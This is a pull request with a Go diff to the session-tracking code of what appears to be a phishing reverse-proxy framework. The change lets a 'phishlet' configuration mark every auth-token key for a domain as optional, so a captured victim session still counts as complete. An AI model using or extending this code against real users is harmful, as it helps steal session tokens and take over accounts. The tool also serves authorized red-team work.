### PR TITLE
session.go - allow all keys to be optional for a domain

### DIFF
--- a/core/session.go
+++ b/core/session.go
@@ -71,9 +71,13 @@ func (s *Session) AddAuthToken(domain string, key string, value string, path str
 
 	tcopy := make(map[string][]AuthToken)
 	for k, v := range authTokens {
-		tcopy[k] = []AuthToken{}
 		for _, at := range v {
 			if !at.optional {
+				// Only create structure if a required key exists
+				_, isset := tcopy[k]
+				if !isset {
+					tcopy[k] = []AuthToken{}
+				}
 				tcopy[k] = append(tcopy[k], *at)
 			}
 		}


### PR DESCRIPTION
Allow all keys to be optional for a target domain and allow a complete session to be detected.  For example, using the following configuration snippet in a phishlet with other required auth_tokens:

  - domain: 'login.example.com'
    keys: ['key,opt']
